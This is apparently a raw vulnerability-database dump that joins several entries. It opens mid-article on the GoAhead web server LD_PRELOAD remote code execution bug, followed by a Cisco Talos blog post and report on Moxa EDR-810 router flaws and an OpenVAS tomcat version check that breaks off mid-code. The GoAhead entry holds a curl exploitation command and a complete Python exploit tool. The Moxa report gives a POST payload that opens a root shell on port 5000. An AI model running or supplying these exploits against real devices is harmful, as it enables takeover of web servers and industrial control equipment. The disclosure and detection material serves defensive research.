*cgiPath, char **argp, char **envp, char *stdIn, char *stdOut)\r\n{\r\n int fdin, fdout, pid;\r\n\r\n trace(5, \"cgi: run %s\", cgiPath);\r\n\r\n if ((fdin = open(stdIn, O_RDWR | O_CREAT | O_BINARY, 0666)) < 0) {\r\n error(\"Cannot open CGI stdin: \", cgiPath);\r\n return -1;\r\n }\r\n if ((fdout = open(stdOut, O_RDWR | O_CREAT | O_TRUNC | O_BINARY, 0666)) < 0) {\r\n error(\"Cannot open CGI stdout: \", cgiPath);\r\n return -1;\r\n }\r\n\r\n pid = vfork();\r\n if (pid == 0) {\r\n /*\r\n Child\r\n */\r\n if (dup2(fdin, 0) < 0) {\r\n printf(\"content-type: text/html\\n\\nDup of stdin failed\\n\");\r\n _exit(1);\r\n\r\n } else if (dup2(fdout, 1) < 0) {\r\n printf(\"content-type: text/html\\n\\nDup of stdout failed\\n\");\r\n _exit(1);\r\n\r\n } else if (execve(cgiPath, argp, envp) == -1) {\r\n printf(\"content-type: text/html\\n\\nExecution of cgi process failed\\n\");\r\n }\r\n ...\r\n}\r\n```\r\n\r\nStill, this is kind of annoying (but not impossible) having to remotely guess the temporary filename containing our `POST` payload. Fortunately, the Linux `procfs` filesystem has a nice symbolic link that we can use to reference the stdin descriptor, which points to our temporary file. This can leveraged by pointing `LD_PRELOAD` to `/proc/self/fd/0`. This can also be accessed using `/dev/stdin`.\r\n\r\nFigure-16: [linux/fs/proc/self.c](https://elixir.free-electrons.com/linux/latest/source/fs/proc/self.c)\r\n```\r\nstatic const char *proc_self_get_link(struct dentry *dentry,\r\n\t\t\t\t struct inode *inode,\r\n\t\t\t\t struct delayed_call *done)\r\n{\r\n\tstruct pid_namespace *ns = inode->i_sb->s_fs_info;\r\n\tpid_t tgid = task_tgid_nr_ns(current, ns);\r\n\tchar *name;\r\n\r\n\tif (!tgid)\r\n\t\treturn ERR_PTR(-ENOENT);\r\n\t/* 11 for max length of signed int in decimal + NULL term */\r\n\tname = kmalloc(12, dentry ? GFP_KERNEL : GFP_ATOMIC);\r\n\tif (unlikely(!name))\r\n\t\treturn dentry ? ERR_PTR(-ENOMEM) : ERR_PTR(-ECHILD);\r\n\tsprintf(name, \"%d\", tgid);\r\n\tset_delayed_call(done, kfree_link, name);\r\n\treturn name;\r\n}\r\n\r\nstatic const struct inode_operations proc_self_inode_operations = {\r\n\t.get_link\t= proc_self_get_link,\r\n};\r\n```\r\n\r\nIf we put all this information together, we can reliably exploit the vulnerability by sending a `POST` request containing a malcious shared object which contains a `constructor` to be called when loaded. We also specify an HTTP parameter containing `?LD_PRELOAD=/proc/self/fd/0` which will point to the temporary file on disk containing the attackers payload. At this point it\u2019s game over.\r\n\r\nFigure-17: exploiting via the command line\r\n```\r\ndaniel@makemyday:~/goahead/PoC$ curl -X POST --data-binary @payload.so http://makemyday/cgi-bin/cgitest?LD_PRELOAD=/proc/self/fd/0 -i | head\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 9931 0 2035 100 7896 2035 7896 0:00:01 0:00:01 --:--:-- 9774\r\nHTTP/1.1 200 OK\r\nDate: Sun Dec 17 13:08:20 2017\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Frame-Options: SAMEORIGIN\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nhello: World!\r\nContent-type: text/html\r\n\r\ndaniel@makemyday:~/goahead/PoC$\r\n```\r\n\r\nIf you would like a ready-to-go exploit please check out our [advisory repo](https://github.com/elttam/advisories/tree/master/CVE-2017-17562) on GitHub.\r\n\r\n### CONCLUSION\r\nThis vulnerability was an interesting case study in how to remotely exploit `LD_PRELOAD`, and was tested (and worked) against all versions of the GoAhead web server. The construct itself may exist in other services, and it would be interesting to investigate. It may be possible to just use the exploit string and do this blind without actually auditing any code.\r\n\r\nAlthough the CGI handling code remained relatively stable in all versions of the web server (which made it the ideal target), there has been a significant amount of code churn over the years in other modules. It\u2019s possible there are other interesting vulnerabilities - and for those interested I\u2019d recommend starting with a grep for `websDefineHandler` entry points.\r\n\r\nIf you\u2019re interesting in learning more about linking and loading, there\u2019s a great article [here](https://www.cs.stevens.edu/~jschauma/810/elf.html) and [here](http://s.eresi-project.org/inc/articles/elf-rtld.txt) that we suggest you check out.\r\n\r\nThanks for reading!", "modified": "2017-12-18T00:00:00", "published": "2017-12-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96997", "id": "SSV:96997", "type": "seebug", "title": "GOAHEAD \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2017-17562)", "sourceData": "\n #!/usr/bin/python\r\n\r\n# GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit\r\n\r\n#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n#+++++++++++++++++++++++++++++++++++:--/++++++++++++++++++++++++++++++++++++\r\n#+++++++++++++++++++++++++++++++/:-......-:/++++++++++++++++++++++++++++++++\r\n#++++++++++++++++++++++/////::-..............-:://///+++++++++++++++++++++++\r\n#++++++++++++++++++++++..............-:..............+++++++++++++++++++++++\r\n#++++++++++++++++++++++..........-://+++/:-..........+++++++++++++++++++++++\r\n#++++++++++++++++++++++......://++++++++++++//::.....+++++++++++++++++++++++\r\n#++++++++++++++++++++++......++++++++++++++++++/.....+++++++++++++++++++++++\r\n#++++++++++++++++++++++......:/+++++++++++++++/-.....+++++++++++++++++++++++\r\n#++++++++++++++++++++++.........--::////:::--........+++++++++++++++++++++++\r\n#++++++++++++++++++++++-...........................:/+++++++++++++++++++++++\r\n#++++++++++++++++++++++:.....-................--:/++++++++++++++++++++++++++\r\n#+++++++++++++++++++++++-....-+///::::::::///+++++++++++++++++++++++++++++++\r\n#+++++++++++++++++++++++/.....-/++++++++++++++++/::+++++++++++++++++++++++++\r\n#++++++++++++++++++++++++/-.....-/++++++++/:--...-/+++++++++++++++++++++++++\r\n#++++++++++++++++++++++++++:.......:/++/:.......:+++++++++++++++++++++++++++\r\n#+++++++++++++++++++++++++++/-................-/++++++++++++++++++++++++++++\r\n#+++++++++++++++++++++++++++++/:-..........-:/++++++++++++++++++++++++++++++\r\n#++++++++++++++++++++++++++++++++/:--..--:/+++++++++++++++++++++++++++++++++\r\n#++++++++++++++++++++++++++++++++++++++++++++++++(c) 2017 elttam Pty Ltd.+++\r\n\r\n# ~/goahead_exploit>>> ./makemyday.py -h\r\n# usage: makemyday.py [-h] [--server SERVER] [--port PORT] [--maxconn {1-256}]\r\n# [--verbose]\r\n# {fingerprint,stage,exploit,findcgi} ...\r\n#\r\n# GoAhead httpd remote LD_PRELOAD exploit.\r\n#\r\n# positional arguments:\r\n# {fingerprint,stage,exploit,findcgi}\r\n# fingerprint fingerprint if GoAhead server uses CGI\r\n# stage send a staging payload and wait indefinitely\r\n# exploit run exploit\r\n# findcgi brute force cgi script names\r\n#\r\n# optional arguments:\r\n# -h, --help show this help message and exit\r\n# --server SERVER target ip or hostname, default is localhost\r\n# --port PORT target port, default is 80\r\n# --maxconn {1-256} max concurrent requests, default is 1\r\n# --verbose, -v increase verbosity level\r\n#\r\n# See https://www.elttam.com.au for more information.\r\n\r\n# >>>./makemyday.py --server 192.168.1.24 --port 80 exploit --payload ./payloads/X86_64-hw.so\r\n# exploit works!\r\n\r\nimport argparse\r\nimport httplib\r\nimport sys\r\nimport threading\r\nfrom string import Template\r\n\r\nclass GoAheadExploit(object):\r\n '''GoAheadExploit'''\r\n qid = None\r\n payload = None\r\n exploited = False\r\n\r\n def __init__(self):\r\n '''Configure arguments and run the exploit'''\r\n parser = argparse.ArgumentParser(\r\n description=\"GoAhead httpd remote LD_PRELOAD exploit.\",\r\n epilog=\"See https://www.elttam.com.au for more information.\"\r\n )\r\n\r\n parser.add_argument('--server', default=\"localhost\",\r\n help='target ip or hostname, default is localhost')\r\n parser.add_argument('--port', type=int, default=80,\r\n help='target port, defaults is 80')\r\n parser.add_argument('--maxconn', type=int, default=1, choices=xrange(1, 256),\r\n metavar=\"{1-256}\", help='max concurrent requests, default is 1')\r\n parser.add_argument('--verbose', '-v', default=0, action='count',\r\n help='increase verbosity level')\r\n\r\n common_options = argparse.ArgumentParser(add_help=False)\r\n common_options.add_argument('--cginame', default=\"cgitest\",\r\n help='target cgi script')\r\n common_options.add_argument('--payload', nargs='?',\r\n type=argparse.FileType('r'), default=sys.stdin,\r\n help='shared object file to execute (defaults to stdin)')\r\n\r\n cmd_subparsers = parser.add_subparsers(dest=\"action\")\r\n cmd_subparsers.add_parser(\r\n 'fingerprint', help='fingerprint if GoAhead server uses CGI')\r\n cmd_subparsers.add_parser('stage', parents=[common_options],\r\n help='send a staging payload and wait indefinitely')\r\n cmd_subparsers.add_parser('exploit', parents=[common_options],\r\n help='run exploit')\r\n findcgi = cmd_subparsers.add_parser(\r\n 'findcgi', help='brute force cgi script names')\r\n findcgi.add_argument('--wordlist', nargs='?',\r\n type=argparse.FileType('r'), default=sys.stdin,\r\n help='list of cgi filenames to brute force (defaults to stdin)')\r\n\r\n # parse command line and call into action\r\n self.args = parser.parse_args()\r\n getattr(self, self.args.action)()\r\n\r\n def fingerprint(self):\r\n '''fingerprint'''\r\n conn = httplib.HTTPConnection(self.args.server, self.args.port)\r\n conn.connect()\r\n conn.request(\r\n \"GET\", \"/cgi-bin/c8fed00eb2e87f1cee8e90ebbe870c190ac3848c\")\r\n if conn.getresponse().read().find(\"CGI process file does not exist\") != -1:\r\n print \"CGI scripting is enabled\"\r\n else:\r\n print \"CGI scripting is disabled\"\r\n conn.close()\r\n\r\n def findcgi(self):\r\n '''findcgi'''\r\n for cginame in self.args.wordlist.readlines():\r\n cginame = cginame[:-1]\r\n conn = httplib.HTTPConnection(self.args.server, self.args.port)\r\n conn.connect()\r\n conn.request(\"GET\", \"/cgi-bin/\" + cginame)\r\n resp = conn.getresponse()\r\n if resp.status == 200:\r\n print \"/cgi-bin/\" + cginame + \" exists.\"\r\n conn.close()\r\n\r\n def stage(self):\r\n '''stage'''\r\n payload = self.args.payload.read()\r\n headers = {\"Host\": self.args.server,\r\n \"User-Agent\": \"curl/7.51.0\",\r\n \"Accept\": \"*/*\",\r\n \"Content-Length\": str(len(payload) + 1)}\r\n\r\n conn = httplib.HTTPConnection(self.args.server, self.args.port)\r\n conn.connect()\r\n conn.request(\"POST\", \"/cgi-bin/\" + self.args.cginame, payload, headers)\r\n try:\r\n conn.getresponse()\r\n except httplib.BadStatusLine:\r\n pass\r\n conn.close()\r\n\r\n def exploit(self):\r\n '''exploit'''\r\n for _ in range(0, self.args.maxconn):\r\n tid = threading.Thread(self.do_exploit(verify,))\r\n tid.start()\r\n\r\n def do_exploit(self, verify_callback):\r\n '''do_exploit'''\r\n if not self.payload:\r\n self.payload = self.args.payload.read()\r\n contentlen = len(self.payload)\r\n\r\n headers = {\"Host\": self.args.server,\r\n \"User-Agent\": \"curl/7.51.0\",\r\n \"Accept\": \"*/*\",\r\n \"Content-Length\": str(contentlen)}\r\n\r\n exploit_string = Template(\"/cgi-bin/${cginame}?LD_PRELOAD=\"\r\n \"/proc/self/fd/0\").substitute({\r\n \"cginame\": self.args.cginame\r\n })\r\n\r\n while not self.exploited:\r\n conn = httplib.HTTPConnection(self.args.server, self.args.port, timeout=10)\r\n conn.connect()\r\n conn.request(\"POST\", exploit_string, self.payload, headers)\r\n try:\r\n if verify_callback(conn.getresponse()):\r\n self.exploited = True\r\n print \"exploit works!\"\r\n except httplib.BadStatusLine:\r\n pass\r\n conn.close()\r\n\r\n# put your payload callback/verification code here\r\ndef verify(res):\r\n '''validation callback'''\r\n if res.getheader(\"hello\"):\r\n return True\r\n return False\r\n\r\nif __name__ == '__main__':\r\n GoAheadExploit()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96997", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-05-06T18:56:20", "bulletinFamily": "blog", "description": "_These vulnerabilities were discovered by Carlos Pacho of Cisco Talos_ \n \nToday, Talos is disclosing several vulnerabilities that have been identified in Moxa EDR-810 industrial secure router. \n \nMoxa EDR-810 is an industrial secure router with firewall/NAT/VPN and managed Layer 2 switch functions. It is designed for Ethernet-based security applications in remote control or monitoring networks. Moxa EDR-810 provides an electronic security perimeter for the protection of critical assets such as pumping/ treatment systems in water stations, DCS systems in oil and gas applications, and PLC/SCADA systems in factory automation. \n \nMoxa has released an [updated version](<https://www.moxa.com/support/download.aspx?type=support&id=15851>) of the firmware. Users are advised to download and install the latest release as soon as possible to fix this issue. \n \n \n\n\n## Vulnerability Details\n\n### TALOS-2017-0472 (CVE-2017-12120) Moxa EDR-810 Web Server ping Command Injection Vulnerability\n\n \n[TALOS-2017-0472](<http://www.talosintelligence.com/reports/TALOS-2017-0472>) is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker may be able to inject OS commands into the ifs= parm in the \"/goform/net_WebPingGetValue\" uri to trigger this vulnerability and take control over the targeted device. \n \n\n\n### TALOS-2017-0473 (CVE-2017-12121) Moxa EDR-810 Web RSA Key Generation Command Injection Vulnerability\n\n \n[TALOS-2017-0473](<http://www.talosintelligence.com/reports/TALOS-2017-0473>) is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker can inject OS commands into the rsakey\\\\_name= parm in the \"/goform/WebRSAKEYGen\" uri to trigger this vulnerability and take control over the targeted device. \n \n\n\n### TALOS-2017-0474 (CVE-2017-14435 to 14437) Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities\n\n \n[TALOS-2017-0474](<http://www.talosintelligence.com/reports/TALOS-2017-0474>) describes three separate exploitable denial of service vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to \"/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini\" without a cookie header to trigger this vulnerability. \n \n\n\n### TALOS-2017-0475 (CVE-2017-12123) Moxa EDR-810 Cleartext Transmission of Password Vulnerability\n\n \n[TALOS-2017-0475](<http://www.talosintelligence.com/reports/TALOS-2017-0475>) is an exploitable clear text transmission of password vulnerability that exists in the web server and telnet functionality of Moxa EDR-810. An attacker may be able to inspect network traffic to retrieve the administrative password for the device. The attacker may then use the credentials to login into the device web management console as the device administrator. \n \n\n\n### TALOS-2017-0476 (CVE-2017-12124) Moxa EDR-810 Web Server URI Denial of Service Vulnerability\n\n \n[TALOS-2017-0476](<http://www.talosintelligence.com/reports/TALOS-2017-0476>) is an exploitable denial of service vulnerability that exists in the web server functionality of Moxa EDR-810. Access to a specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability. \n \n\n\n### TALOS-2017-0477 (CVE-2017-12125) Moxa EDR-810 Web Server Certificate Signing Request Command Injection Vulnerability\n\n \n[TALOS-2017-0477](<http://www.talosintelligence.com/reports/TALOS-2017-0477>) is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request can cause a privilege escalation resulting in access to root shell. An attacker may be able to inject OS commands into the CN= parm in the \"/goform/net_WebCSRGen\" uri to trigger this vulnerability. \n \n\n\n### TALOS-2017-0478 (CVE-2017-12126) Moxa EDR-810 Web Server Cross-Site Request Forgery Vulnerability\n\n \n[TALOS-2017-0478](<http://www.talosintelligence.com/reports/TALOS-2017-0478>) is an exploitable cross-site request forgery (CSRF) vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP request can trigger a CSFR vulnerability which may allow the attacker to change the device configuration. An attacker can create a malicious html code to trigger this vulnerability and entice the user to execute the malicious code. \n \n\n\n### TALOS-2017-0479 (CVE-2017-12127) Moxa EDR-810 Plaintext Password Storage Vulnerability\n\n \n[TALOS-2017-0479](<http://www.talosintelligence.com/reports/TALOS-2017-0479>) is a password storage vulnerability that exists in the operating system functionality of Moxa EDR-810. The device stores credentials in plaintext in /magicP/cfg4.0/cfg_file/USER_ACCOUNT.CFG. This file mirrors the contents of /etc/shadow, except that all the passwords are stored in plaintext. \n \n\n\n### TALOS-2017-0480 (CVE-2017-12128) Moxa EDR-810 Server Agent Information Disclosure Vulnerability\n\n \n[TALOS-2017-0480](<http://www.talosintelligence.com/reports/TALOS-2017-0480>) is an exploitable information disclosure vulnerability that exists in the Server Agent functionality of Moxa EDR-810. A specially crafted TCP packet can cause the device to leak data and result in an information disclosure. An attacker may be able to send a specially crafted TCP packet to trigger this vulnerability. \n \n\n\n### TALOS-2017-0481 (CVE-2017-12129) Moxa EDR-810 Web Server Weak Cryptography for Passwords Vulnerability\n\n \n[TALOS-2017-0481](<http://www.talosintelligence.com/reports/TALOS-2017-0481>) is an exploitable Weak Cryptography for Passwords vulnerability that exists in the web server functionality of Moxa EDR-810. After the initial login, each authenticated request sends a HTTP packet with a MD5 hash of the password. This hash is not salted and can be cracked, revealing the device's password. \n \n\n\n### TALOS-2017-0482 (CVE-2017-14432 to 14434) Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities\n\n \n[TALOS-2017-0482](<http://www.talosintelligence.com/reports/TALOS-2017-0482>) describes multiple exploitable command injection vulnerabilities that exist in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST request may cause a privilege escalation resulting in an attacker having access to a root shell. An attacker may be able to inject OS commands into various parameters in the \"/goform/net_Web_get_value\" uri to trigger this vulnerability. \n \n\n\n### TALOS-2017-0487 (CVE-2017-14438 and 14439) Moxa EDR-810 Service Agent Multiple Denial of Service\n\n \n[TALOS-2017-0487](<http://www.talosintelligence.com/reports/TALOS-2017-0487>) describes two exploitable denial of service vulnerabilities that exist in the Service Agent functionality of Moxa EDR-810. A specially crafted packet can cause a denial of service. An attacker may be able to send a large packet to tcp ports 4000 or 4001 to trigger this vulnerability. \n \nFor the full technical details of these vulnerabilities, please refer to the vulnerability advisories that are posted on our website: \n \n[http://www.talosintelligence.com/vulnerability-reports/](<https://www.google.com/url?q=http://www.talosintelligence.com/vulnerability-reports/&sa=D&ust=1523558764918000>) \n \n\n\n### Affected versions\n\n \nThe discovered vulnerabilities have been confirmed in Moxa EDR-810 V4.1 build 17030317 but they may also affect earlier versions of the product. \n \n\n\n## Discussion\n\n \nIndustrial control systems (ICS), including supervisory control and data acquisition (SCADA) systems, are used in industries such as energy providers, manufacturing and critical infrastructure providers in order to control and monitor various aspects of various industrial processes. ICS systems employ many mechanisms and protocols also used in traditional IT systems and networks. \n \nAlthough some characteristics of traditional IT systems and ICS are similar, ICS also have characteristics that differ in their service level and performance requirements. Many of these differences come from the fact that ICS has a direct effect on the physical world which may also include a risk to the health and safety of the population and a potential to cause damage to the environment. For that reason ICS have unique reliability requirements and may use real-time operating systems and applications that would not be used in everyday IT environments. \n \nOne of the pillars of ICS security, as well as the security of traditional IT networks, is restricting access to network activity. This may include unidirectional gateways, a demilitarized zone (DMZ) network architecture with firewalls and separate authentication mechanisms and credentials for users of corporate and ICS networks. \n \nICS devices, including firewalls that secure networks, run software which can contain vulnerabilities and serve as a pathway that may allow attackers to take advantage and intrude into an ICS network environment. \n \nCisco Talos vulnerability research team also focuses on non traditional computing environments, including ICS, to find previously unknown vulnerabilities and work with vendors to responsibly disclose them while allowing the vendor enough time to improve security of the products by fixing the discovered vulnerabilities. \n \nMoxa EDR-810 is one of the devices specialized in providing firewalls specifically designed to function within ICS infrastructure and provide network security to ICS processes. Cisco Talos researchers have discovered several vulnerabilities affecting the security of the product. Moxa EDR-810 users are recommended to update the software as soon as possible to avoid their ICS environment potentially being exploited by attackers. \n \n\n\n## Coverage\n\n \nThe following Snort Rules detect attempts to exploit these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For all current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: \n \n\n\n * 31939, 40880, 44835-44837, 44840-44842, 44847-44852, 44855, 44858\n\n[![](http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA)](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=dNMKguKXjWw:nGXvtU2AjLo:yIl2AUoC8zA>)\n\n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/dNMKguKXjWw)", "modified": "2018-04-13T16:03:59", "published": "2018-04-13T08:57:00", "id": "TALOSBLOG:A234F8456A3CCBBC3F469D5F49D64E29", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/dNMKguKXjWw/vuln-moxa-edr-810.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Moxa EDR-810 Industrial Secure Router", "cvss": {"score": 0.0, "vector": "NONE"}}], "talos": [{"lastseen": "2019-05-29T19:20:13", "bulletinFamily": "info", "description": "# Talos Vulnerability Report\n\n### TALOS-2017-0472\n\n## Moxa EDR-810 Web Server ping Command Injection Vulnerability\n\n##### April 13, 2018\n\n##### CVE Number\n\nCVE-2017-12120 \n\n### Summary\n\nAn exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation, resulting in a root shell. An attacker can inject OS commands into the ip= parm in the \"/goform/net_WebPingGetValue\" URI to trigger this vulnerability.\n\n### Tested Versions\n\nMoxa EDR-810 V4.1 build 17030317\n\n### Product URLs\n\n<https://www.moxa.com/product/EDR-810.htm>\n\n### CVSSv3 Score\n\n8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n### Details\n\nOnce logged in to the device's web interface, a diagnostic ping page can be found. This page asks the user for an IP address to ping. There is input validation client-side, but it can be easily bypassed by using tools, such as cURL or Wget. There is no server-side validation of input. The page will call the system to run the Linux ping command. The system will run the following command with '%s' as user-controlled input.\n \n \n echo \"$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)\" > /mnt/ramdisk/MagicPingResult\n \n\nThe code below shows user input being passed to system.\n \n \n R0, =aRmFMntRamdiskM ; \"rm -f /mnt/ramdisk/MagicPingResult\"\n .text:0003C7D8 BL system\n .text:0003C7DC LDR R2, =aEchoPingC4SQW3 ; \"echo \"$(ping -c 4 %s -q -W 3| grep 'received' | cut -d ' ' -f4)\" > /mnt/ramdisk/MagicPingResult\"\n .text:0003C7E0 SUB R1, R11, #-command\n .text:0003C7E4 SUB R3, R11, #-dest\n .text:0003C7E8 MOV R0, R1 ; s\n .text:0003C7EC MOV R1, R2 ; format\n .text:0003C7F0 MOV R2, R3\n .text:0003C7F4 BL sprintf\n .text:0003C7F8 SUB R3, R11, #-command\n .text:0003C7FC MOV R0, R3 ; command\n .text:0003C800 BL system # call to system\n \n\nVulnerable URI: /goform/net_WebPingGetValue Vulnerable Parameter: ip=\n\n### Exploit Proof-of-Concept\n\nThe following POST will start a root shell on port 5000.\n \n \n POST: /goform/net_WebPingGetValue HTTP/1.1\n Host: DeviceIP\n Cooke: Valid-Cookie\n Content-Type: japplication/x-www-form-urlencoded\n \n pingTemp=127.0.0.1&ifs=1&ip=`tcpsvd 0 5000 /bin/bash`#\n \n\n### Timeline\n\n2017-11-15 - Vendor Disclosure \n2017-11-19 - Vendor Acknowledged \n2017-12-25 - Vendor provided timeline for fix (Feb 2018) \n2018-01-04 - Timeline pushed to mid-March per vendor \n2018-03-24 - Talos follow up with vendor for release timeline \n2018-03-26 - Timeline pushed to 4/13/18 per vendor \n2018-04-12 - Vendor patched & published new firmware on website \n2018-04-13 - Public Release\n\n##### Credit\n\nDiscovered by Carlos Pacho of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0473\n\nPrevious Report\n\nTALOS-2018-0529\n", "modified": "2018-04-13T00:00:00", "published": "2018-04-13T00:00:00", "id": "TALOS-2017-0472", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0472", "title": "Moxa EDR-810 Web Server ping Command Injection Vulnerability", "type": "talos", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "description": "Check the version of tomcat", "modified": "2019-03-08T00:00:00", "published": "2017-04-14T00:00:00", "id": "OPENVAS:1361412562310882690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882690", "title": "CentOS Update for tomcat CESA-2017:0935 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for tomcat CESA-2017:0935 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882690\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-14 06:30:11 +0200 (Fri, 14 Apr 2017)\");\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-8745\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for tomcat CESA-2017:0935 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of tomcat\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Apache Tomcat is a servlet container for\nthe Java Servlet and JavaServer Pages (JSP) technologies.\n\nSecurity Fix(es):\n\n * It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction with\na proxy that also permitted the invalid characters but with a different\ninterpretation, to inject data into the HTTP response. By manipulating the\nHTTP response the attacker could poison a web-cache, perform an XSS attack,\nor obtain sensitive information from requests other then their own.\n(CVE-2016-6816)\n\nNote: This fix causes Tomcat to respond with an HTTP 400 Bad Request error\nwhen request contains characters that are not permitted by the HTTP\nspecification to appear not encoded, even though they were previously\naccepted. The newly introduced system property\ntomcat.util.http.parser.HttpParser.requestTargetAllow can be used to\nconfigure Tomcat to accept curly braces ({ and }) and the pipe symbol\nin not encoded form, as these are often used in URLs without being properly\nencoded.\n\n * A bug was discovered in the error handling of the send file code for the\nNIO HTTP connector. This led to the current Processor object being added to\nthe Processor cache multiple times allowing information leakage between\nrequests including, and not limited to, session ID and the response body.\n(CVE-2016-8745)\");\n script_tag(name:\"affected\", value:\"tomcat on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:0935\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-April/022384.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-el\", rpm:\"tomcat-el~2.2~api~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-jsp\", rpm:\"tomcat-jsp~2.2~api~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.69~11.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n 